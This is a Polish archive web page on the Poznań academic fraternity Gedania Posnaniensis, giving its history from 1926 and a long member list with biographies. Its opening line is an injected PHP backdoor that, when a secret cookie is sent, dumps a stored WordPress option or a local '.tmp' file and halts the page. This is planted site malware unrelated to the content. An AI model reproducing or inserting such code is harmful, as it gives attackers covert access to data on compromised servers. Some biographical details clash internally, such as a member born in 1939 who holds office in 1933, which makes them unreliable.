if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Gedania Posnaniensis

Dekiel Stanisława Dominikowskiego Nazwa:
Korporacja Akademicka Gedania Posnaniensis
Siedziba:
Poznań
Data powstania:
6 XII 1926 r.
Barwy:
wiśniowa - zielona - złota (symbolika barw: zapał, nadzieja w potęgę polskiego morza, szlachetność)
Dewiza:
„Omnia pro Patria et Mari Polono” (”Wszystko dla Ojczyzny i polskiego morza”)

Rys historyczny

Proporczyk prezydialny Gedanii.

Gedania Posnaniensis powstała 6 XII 1926 r. Skupiała studentów Wyższej Szkoły Handlowej. Należała do tzw. korporacji morskich. Jej szczególny cel wyrażał się w nazwie. Było nim kultywowanie w społeczeństwie idei powrotu Gdańska do Polski, a w szczególności “zdobycie Gdańska dla polskiego handlu”.

Dewizka Stanisława Dominikowskiego, 1936 r.

Gedania początkowo od listopada 1927 r. należała do Zjednoczenia Polskich Akademickich Korporacji Chrześcijańskich. W maju 1932 r. została przyjęta do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: maj 1932 r.). Kandydowała przy Surmie. Prawa członka rzeczywistego uzyskała w 1933 r.

Od połowy lat 30-tych Gedanusi pełnili funkcje w Prezydiach Związku Polskich Korporacji Akademickich oraz Poznańskiego Koła Międzykorporacyjnego. Wiktor Gosieniecki był skarbnikiem Koła 1935/1936, a następnie skarbnikiem Związku Polskich Korporacji Akademickich 1937/1938 (XV kadencja). Wiceprezesem Koła był Adam Wolny 1938, a Witold Lipiński jego skarbnikiem 1938/1939 .

Uroczystości rocznicowe Gedanii, Poznań 1936 r. (?).

W 1932 r. poświęcono sztandar korporacji. Na X-lecie Korporacji ukazało się pamiątkowe wydawnictwo K! Gedania Posnaniensis. 6 grudnia 1926-1939 (Poznań 1936). W marcu 1936 r. wraz z Baltią, Masovią i Laconią stworzyła Porozumienie Korporacji Morskich. Współuczestniczyła w organizowaniu “Tygodni Pomorza”, a w tych ramach “Akademii Morskich”.

Gedanusi, Poznań koniec lat 30-tych.

W 1933 r. Gedania Posnaniensis zawarła kartel z K! Surma.

Gedania, Poznań lata 30-te.

Całkowita ustalona, choć niekompletna imienna lista członków obejmuje 94 nazwiska, w tym dwunastu członków honorowych.

Przekazanie sztandaru Gedanii na Akademię Ekonomiczną, Poznań 5 X 1974 r.

Brak szczegółowych informacji dotyczących powojennej działalności Gedanii, choć wiadomo o spotkaniach grupy Gedańczyków w Poznaniu. Sztandar korporacji został przechowany w czasie wojny przez Stanisława Dominikowskiego i przekazany w trakcie inauguracji roku akademickiego 1974/1975 w dniu 5 X 1974 r. na Akademię Ekonomiczną w Poznaniu.

Na Balu Międzykorporacyjnym w Bazarze, Poznań 1936 r.

Lista członków

Poniższa, niekompletna lista członków Gedanii Posnaniensis obejmuje niemal sto nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

  Franciszek Budzyński, 1936 r.

 1. Franciszek Budzyński, (21 listopada 1875 - 1958) przemysłowiec, założyciel i Filister honorowy Gedanii Posnaniensis

 2. Franc, dyrektor Wielkopolskiej Wytwórni Chemicznej, Filister honorowy Gedanii Posnaniensis

  Stefan Kałamajski, 1936 r.

 3. Stefan Kałamajski, (29 lipca 1882 w Kuklinowie Wlkp. - 1949) działacz gospodarczy i polityczny, właściciel firm handlowych i przemysłowych, m.in. (największego w Polsce) kina “Słońce” w Poznaniu, prezes Izby Przemysłowo-Handlowej w Poznaniu, radny Poznania, honorowy konsul duński, założyciel i Filister honorowy Gedanii Posnaniensis

  Władysław Kontrowicz, 1936 r.

 4. Władysław Kontrowicz, (22 czerwca 1878 w Stęszewie - 1975) kupiec i bankowiec, m.in. do 1923 dyrektor Bazaru, a w latach 30-tch Komunalnej Kasy Oszczędności w Poznaniu, założyciel i Filister honorowy Gedanii Posnaniensis

 5. Stanisław Kucharski, dyrektor Banku Związku Spółdzielni Zarobkowych, Filister honorowy Gedanii Posnaniensis
 6. Eugeniusz Kwiatkowski, (30 grudnia 1888 w Krakowie - 22 sierpnia 1974 w Krakowie) ekonomista, naukowiec, działacz gospodarczy i polityczny w II Rzeczypospolitej, minister przemysłu i handlu w gabinetach Kazimierza Bartla i Józefa Piłsudskiego 1926-30, w latach 1935-39 wicepremier i minister skarbu w gabinetach Mariana Zyndram-Kościałkowskiego i Felicjana Sławoja Składkowskiego, poseł na Sejm Ustawodawczy 1947-52, autor koncepcji rozwoju handlu morskiego, budowniczy portu w Gdyni, autor planu oraz budowniczy Centralnego Okręgu Przemysłowego, dr honoris causa Uniwersytetu Gdańskiego 1974, pośmiertnie odznaczony Orderem Orła Białego 1996, członek honorowy korporacji Pomerania i Gedania Posnaniensis

  Franciszek Maciejewski, 1936 r.

 7. Franciszek Maciejewski, (11 września 1879 w Kobylinie Wlkp. - 1948), działacz gospodarczy, prezes Związku Fabrykantów w Poznaniu, radca Izby Przemysłowo-Handlowej w Poznaniu, prezes Związku Obrony Przemysłu Polskiego i Związku Obrony Kresów Wschodnich, członek Kuratorjum Fundacji WSH w Poznaniu, kurator Bratniej Pomocy Studentów WSH w Poznaniu, wiceprezes Towarzystwa Przyjaciół Młodzieży Akademickiej przy WSH w Poznaniu, założyciel i Filister honorowy Gedanii Posnaniensis, kurator korporacji, pochowany na Cmentarzu Górczyńskim w Poznaniu

  Stanisław Maciejewski, 1936 r.

 8. Stanisław Maciejewski, (7 maja 1875 w Poznaniu - ), dyrektor firmy Georges Geiling C-ie w Poznaniu, prezes Zjednoczenia Kurkowych Bractw Strzeleckich RP, założyciel i Filister honorowy Gedanii Posnaniensis

  Wiktor Maćkowiak, 1936 r.

 9. Wiktor Maćkowiak, (16 październik 1878 w Krobii Wlkp. - ), inż., pierwszy dyrektor Państwowej Wyższej Szkoły Budowy Maszyn, w latach 30-tych dyrektor Poznańskiej Kolei Elektrycznej, członek Związku Ludowo-Narodowego, Filister honorowy Gedanii, od 1931 Ojciec Korporacji

 10. Euzebjusz Wardejn, (ok. 1879 - 24 listopada 1934 w Warszawie) ojciec Zdzisława (Gedania Posnaniensis), dyrektor Oddziału Banku Polskiego w Poznaniu, Filister honorowy Gedanii Posnaniensis, pochowany na warszawskich Powązkach (kw. 294, rz. 1, m. 20-21)
 11. Stanisław Waschke, pierwszy Ojciec Korporacji 1926-31, dyrektor Izby Przemysłowo-Handlowej w Poznaniu, Filister honorowy Gedanii Posnaniensis

  Bolesław Wybieralski, 1936 r.

 12. Bolesław Wybieralski, (6 kwietnia 1883 w Jutrosinie Wlkp. - 1938), Wyższy Radca Krajowy, dyrektor Ubezpieczalni Krajowej w Poznaniu, założyciel i Filister honorowy Gedanii Posnaniensis

Członkowie rzeczywiści

 1. Adamkiewicz,
 2. Jerzy Balcer, wiceprezes Akademickiego Koła Polsko-Czechosłowackiego WSH 1932/33
 3. Ludwik Biały,
 4. Tadeusz Borowski, c. 1936
 5. Florian Breitenbach, założyciel Gedanii Posnaniensis, prezes r.a. 1930/31, olderman 1932/33 oraz 1933

  Leszek Buszkowski, koniec lat 30-tych.

 6. Leszek Buszkowski, (1913 - 12 sierpnia 1987) c. 1936, mgr, w wojnie obronnej 1939 w Armii Poznań, ranny w walkach, w konspiracji w AK, więzień obozów koncentracyjnych Gross Rosen, Buchenwald i Bergen Belsen, pochowany na Cmentarzu w Puszczykowie

 7. Mikołaj Bychowiec, wiceprezes 1934/35, prezes Koła Naukowego WSH 1935
 8. Leonard Byliński, (1916? - 13 (?) stycznia 1982) c. 1936, uczestnik wojny obronnej 1939, więzień oflagu VIIA w Murnau, odznaczony m.in.. Krzyżem Kawalerskim OOP, Medalem “Za udział w wojnie obronnej 1939″, pochowany na Cmentarzu przy ul. Wojciechowskiego na Piątkowie w Poznaniu
 9. Jarosław Czabański, akt. ok. 1930
 10. Paweł Dąbrowski, student WSH, prezes 1933/34 i 1934/35, członek Zarządu Zwiazku Akademickich Kół Polsko-Czechosłowackich, sekretarz Koła Naukowego WSH 1933/34, działacz OWP, emisariusz ZO SN w Poznaniu

  Paweł Diesing, 1936 r.

 11. Paweł Diesing, (19 listopada 1904 - ) założyciel Gedanii Posnaniensis

 12. Artur Dominiak, olderman 1937/38 oraz 1938/39

  Sylwester Dominiak, lata 30-te.

 13. Sylwester Dominiak, (27 grudnia 1908 - 30 sierpnia 1991)

 14. Stanisław Dominikowski, (12 kwietnia 1910 w Radomsku - 22 września 1992 w Poznaniu) prezes 1934/35 oraz 1935/36, członek Zarządu Wydziału Kół Naukowych Ekonomicznych i Handlowych OZAKN 1932/33, członek Zarządu Koła Naukowego 1933/34 i 1935/36, członek Zarządu Bratniej Pomocy WSH, w czasie drugiej wojny światowej przechowywał sztandar Gedanii, skarbnik Stowarzyszenia Filistrów Korporacji Akademickich 1991-92
 15. Jerzy Frąckowiak, ( - 2 maja 1998 w Chicago), po wojnie na emigracji w Stanach Zjednoczonych, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago
 16. Walter Gac, c. 1936
 17. Ludwik Gerlicz,
 18. Edward Gliszewski, c. 1936
 19. Ludwik Gliszewski, c. 1936
 20. Mieczysław Gołaszewski, ( - 1989)
 21. Jan Wiktor Gorgolewski, ( - 25 lipca 1995 w Poznaniu) członek Komisji Rewizyjnej Stowarzyszenia Filistrów Poznańskich Korporacji Akademickich 1991-94
 22. Witold Gosieniecki, (15 czerwca 1912 w Poznaniu - 10 marca 1940 w Łodzi) student i absolwent WSH/AH, przedostatni prezes 1937/38, skarbnik PKM-u 1935/36, skarbnik ZPKA 1937-38 (XV kadencja), ppor. rez. 1935, w wojnie obronnej 1939 w 57 Pułku Piechoty, ranny w nogę w bitwie nad Bzurą, zmarł z powodu zakażenia rany, pochowany w grobie rodzinnym na Cmentarzu w Puszczykowie
 23. Henryk Grabowski, ( - 1987) c. 1936, wiceprezes Bratniej Pomocy Akademii Handlowej 1938/39, prezes Młodzieży Wszechpolskiej AH 1938/39, działacz SN, kierownik Wydziału Propagandy ZO NOW w Poznaniu, następnie w Krakowie
 24. Wincenty Grzegorzewski,
 25. Wojciech Gwizdała,
 26. Karol Heisig, c. 1936, członek Zarządu Bratniej Pomocy Studentów UP 1939
 27. Zbigniew Heliński, założyciel Gedanii Posnaniensis
 28. Stanisław Jankowski, sekretarz 1933/34
 29. Józef Kalenkiewicz, wiceprezes r.a. 1930/31
 30. Zygmunt Kanonik, c. 1936
 31. Lech Kłossowski, członek Sądu Koleżeńskiego Bratniej Pomocy WSH 1933/34

  Stefan Knopiński, 1936 r.

 32. Stefan Knopiński, prezes 1936/37

 33. Janusz Knowski, c. 1936
 34. Edmund Konieczny, c. 1936, prezes Koła Naukowego AH 1938/39, po wojnie prawd. za granicą
 35. Leonard Konkiewicz, sekretarz 1933
 36. Marian Koperski, c. 1936
 37. Kazimierz Kosturbiak,
 38. Tomasz Kotliński, olderman 1934/35
 39. Edward Kowalewski, wiceprezes 1933/34, olderman 1933/34, członek Komisji Rewizyjny Koła Naukowego WSH 1933/34
 40. W. (Witold ?) Lipiński, skarbnik PKM 1938/39
 41. Wiktor Łukaszewski, członek Zarządu Koła Naukowego WSH 1933/34
 42. Marian Manowski, c. 1936
 43. Karol Muszkieta,
 44. Kazimierz Muszyński, (zm. lata 50-te w Lesznie) c. 1936
 45. Władysław Nowakowski,
 46. Seweryn Ochnio,

  Kazimierz Odrobny, koniec lat 30-tych.

 47. Kazimierz Odrobny, (8 maja 1904 w Kłodzisku w pow. szamotulskim - 13 września 1981 w Velbert w Niemczech) student WSH, założyciel Gedanii, olderman 1935/36 oraz 1936/37, działacz Młodzieży Wszechpolskiej oraz SN, sekretarz Zarządu Okręgowego Związku Zawodowego “Praca Polska”, w 1940 aresztowany podczas “łapanki” i osadzony w Forcie VII, więzień obozów koncentracyjnych Auschwitz (?), Dachau, Mauthausen-Gusen, po wojnie pozostał na emigracji w Niemczech, założyciel i dyrektor 1946-49 szkoły polskiej Köln-Mülheim, działacz Polskiego Związku Byłych Więźniów Politycznych Więzień i Obozów Koncentracyjnych w Niemczech Okręgu Nadrenia- Westfalia oraz emigracyjnego Stronnictwa Narodowego w Niemczech, miał być zaangażowany w działalność siatki szpiegowskiej ośrodka tzw. “Łączności z Krajem” w Monachium, współzałożyciel 1951, wiceprzewodniczący 1951-54 oraz przewodniczący 1954-81 Zjednoczenia Polskich Uchodźców w Niemczech, pochowany na cmentarzu w Düsseldorfie-Eller [zob. także artykuł Łukasza Wolaka, Życie, które uczy - Kazimierz Odrobny, (na:) Niemcy-Online.pl http://www.niemcy-online.pl/edukacja/787–ycie-ktore-uczy-kazimierz-odrobny.html]

 48. Stanisław Paikert, c. 1935
 49. Wiesław Pawłowski, (1912 - 6 maja 1984), II wiceprezes 1934/35, pochowany na Cmentarzu na Junikowie w Poznaniu

  Marian Perski, koniec lat 30-tych.

 50. Marian Perski, (1917 w Ostrzeszowie - 26 lutego 2006) student i absolwent WSH/AH, c. 1936, członek Komisji Rewizyjnej Bratniej Pomocy WSH 1933/34, podczas próby przedostania się na Zachód do armii polskiej aresztowany przez patrol graniczny NKWD, skazany na pięć lat łagrów, zesłany w okolice Workuty, zwolniony w 1941, w 2 Korpusie PSZ, w 6 Batalionie Czołgów “Dzieci Lwowskich”, a później w Pułku 6 Pancernym “Dzieci Lwowskich”, ranny pod Loreto, ppor. broni pancernej, po demobilizacji w 1947 powrócił do kraju, pracował w zakładach mięsnych w Obornikach Wlkp., Poznaniu i Krotoszynie, m.in. jako dyrektor, odznaczony m.in. Virtuti Militari, Krzyżem Walecznych, Krzyżem oficerskim OOP

 51. Czesław Piskorski, c. 1936
 52. Lech Puciński, c. 1936
 53. Leon Rolbiecki,
 54. Ludwik Rolbiecki,

  Ludwik Rosiński

 55. Ludwik Rosiński, (7 sierpnia 1903 w Głogówku - 5 sierpnia 1930) założyciel Aeroklubu Akademickiego, zginął śmiercią lotnika

 56. Leon Roszkiewicz, członek Sądu Koleżeńskiego Bratniej Pomocy WSH 1933/34
 57. Marian Roszkiewicz, członek Zarządu Akademickiego Koła Polsko-Czechosłowackiej WSH 1932/33
 58. Rzadkowski,
 59. Alfred Schönfeld, sekretarz 1934/35
 60. Stanisław Sieciechowicz, prezes 1933/34 (?), prezes Akademickiego Koła Polsko-Czechosłowackiego WSH 1933, prokurator Sądu Koleżeńskiego Bratniej Pomocy WSH 1933/34, działacz Młodzieży Wszechpolskiej i OWP, od 1936 członek Komitetu Głównego SN, red. “Polski Narodowej” 1936-37, kierownik administracyjny i redaktor odpowiedzialny “Głosu”
 61. Józef Siekierski, (19 października 1918 - po 1967) absolwent Gimnazjum im. Adama Mickiewicza w Poznaniu 1936, student WSH/AH 1937-39, więzień obozów koncentracyjnych, po wojnie m.in. pracownik “Paged”, “Las”, główny/starszy księgowy firm “Herbapol” we Wrocławiu oraz PWr.
 62. Mieczysław Sieradzki (Sieracki), członek Zarządu Koła Naukowego WSH 1935/36
 63. Radzisław Sobieraj, prezes Związku Akademickiego Kół Polsko-Czechosłowackiego 1933, wiceprezes Koła Naukowego WSH 1933/34
 64. Juljusz Stańczykowski,
 65. Tomasz Stróżyński, c. 1936
 66. Stefan Sułkowski, członek Zarządu Bratniej Pomocy WSH 1933/34

  Edmund Swędrzyński, lata 30-te.

 67. Edmund Swędrzyński, (15 maja 1912 w Trzemesznie - 10 września 1939 w Trzemesznie) s. Michała i Pelagii z d. Majewska, absolwent Gimnazjum im. Michała Kosmowskiego w Trzemesznie 1933, od 1933 student WSH, prezes Zrzeszenia Byłych Uczników Gimnazjum w Trzemesznie, od 1 IX 1939 pracownik Państwowego Banku Rolnego w Warszawie, Oddział w Poznaniu, zastrzelony przez Niemców w czasie obrony Trzemeszna, pochowany na cmentarzu w Trzemesznie [zob. także www.edmundswedrzynski.zafriko.pl]

 68. Ludwik Szczepański, (8 listopada 1901 w Rumienicy pow. Lubawa - 22 sierpnia 1944 pod Falaise) s. Adama i Anastazji z d. Licznerskiej, absolwent Gimnazjum Nauczycielskiego w Lubawie 1923, student Wydziału Matematyczno-Przyrodniczego UP 1928-30, student i absolwent WSH 1933, nauczyciel w Liceum Handlu Morskiego w Gdyni oraz Państwowej Szkole Morskiej w Gdyni, ppor. rez, żołnierz w wojnie obronnej 1939, zbiegł z niewoli sowieckiej, przedostał się przez Węgry do Francji, gdzie wstąpił do PSZ na Zachodzie, w Samodzielnej Brygadzie Strzelców Podhalańskich w kampanii norweskiej, później w Dywizji Pancernej gen. Stanisława Maczka, zginął pod Falaise w Normandii, pochowany na Cmentarzu Urville-Lamagannerie
 69. Wandtke, prezes 1927
 70. Zdzisław Wardejn, (1939 w Persji - we wrześniu 1939 w Warszawie) s. Euzebiusza (dyrektora banku), wiceprezes 1933, członek PKA 1932/33, prezes Młodzieży Wszechpolskiej WSH, po 1936 we władzach okręgowych SN, dyrektor oddziału Banku Polskiego w Poznaniu, ożenił się z Hanną Cygańską, miał dwójkę dzieci Izabelę i Zdzisława, poległ w obronie cytadeli II wojny światowej, miał rzucić się na granat ratując kolegów ze swojego oddziału
 71. Antoni Wąsik,
 72. Leopold Witkowski, wiceprezes 1933/34
 73. Józef Witulski,
 74. Chwalisław Wojtkiewicz, ( - 1989) c. 1936, prezes 1938/39

  Adam Wolny, pod koniec życia.

 75. Adam Wolny, (9 grudnia 1911 w miejsc. Głochuro ? - 2 lutego 1981 w Mannheim-Wallstadt, s. Franciszka (górnika) i Franciszki z d. Błociszewska, studia handlu i ekonomii WSH, wiceprezes PKM 1938, członek i prezes Towarzystwa Czytelni Ludowej, od 1935 członek SN, por. rez., w czasie kampanii obronnej 1939 arsztowany i wywieziony do Oflagu w Doessel, po wyzwoleniu w kompaniach wartowniczych przy armii amerykańskic, a od końca lat 40. do początku 50. dowódca Batalionu Smokowego Kompanii Wartowniczych w Mannheim, członek Ogniska Zjednoczenia Polskich Uchodźców w Mannheim, pochowany na Cmentarzu Mannheim-Wallstadt, po wojnie w stopniu majora [Źródła (poza wskazanymi poniżej spisu członków): opracowanie Łukasza Wolaka]

 76. Sylwester Woźniak, (1912 - październik 1996 w Poznaniu) c. 1936, absolwent WSH Poznań, ekonomista
 77. Roman Wójkiewicz,
 78. Ludwik Zabrocki, (24 listopada 1907 w Czersku - 8 października 1977 w Poznaniu), absolwent Gimnazjum w Chojnicach 1927, studiował filologię polską, indoeuropeistykę, orientalistykę i germanistykę na Wydziale Humanistycznym UP, założyciel Gedanii, po wojnie prof. UAM, dyrektor Instytutu Językoznawstwa, dziekan Wydziału Filologicznego UAM, członek Komisji Ustalania Nazw Miejscowych przy Urzędzie Rady Ministrów, której zadaniem była rekonstrukcja polskiego nazewnictwa na Ziemiach Zachodnich, członek rzeczywisty PAN, pochowany na Cmentarzu Junikowskim w Poznaniu
 79. Zbigniew Zakrzewski,
 80. Aleksander Zygmunt, sekretarz r.a. 1930/31

  Franciszek Żynda, lata 30-te.

 81. Franciszek Żynda, (17 listopoada 1907 w Gnieźnie - 1994), s. Leona, absolwent Gimnazjum oo. Jezuitów w Wilnie 1928, student i absolwent 1932 WSH, założyciel Gedanii Posnaniensis, prezes 1932/33 i 1933, przewodniczący Komisji Rewizyjnej Bratniej Pomocy WSH 1932/33, prezes Koła Naukowego WSH 1932/33, przewodniczący Komisji Rewizyjnej Koła Naukowego WSH 1933/34, przewodniczący Wydziału Kół Ekonomicznych i Handlowych OZAKN 1932/33, po studiach m.in. pracownik sekretariatu WSH 1932-37, od 1937 ekonomista w Izbie Przemysłowo-Handlowej w Lublinie, w czasie okupacji członek “Ojczyzny”, od 1946 we Wrocławiu, pracował m.in. w Spółdzielni “Galena”, Zakładach “Herbapol”, AM we Wrocławiu

 82. Bolesław Żytkowiak,

Strona tytułowa księgi X-lecia.

Listę członków opracowano na podstawie:

1) K! Gedania Posnaniensis. 6 grudnia 1926-1939, Poznań 1936,
2) L. Ter-Oganjan, Lista członków Polskiej Korporacji Akademickiej Gedania Posnaniensis, (w:) Polskie Korporacje Akademickie 1997, nr 14, s. 129 i n.,
3) danych encyklopedycznych i słownikowych oraz rozmów z rodzinami zmarłych członków Gedanii Posnaniensis.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 14 II 2009 r.
Ostatnia zmiana: 22 I 2017 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Korporacja Akademicka Gedania Posnaniensis (Poznań), (na:) www.archiwumkorporacyjne.pl, stan 22 I 2017 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }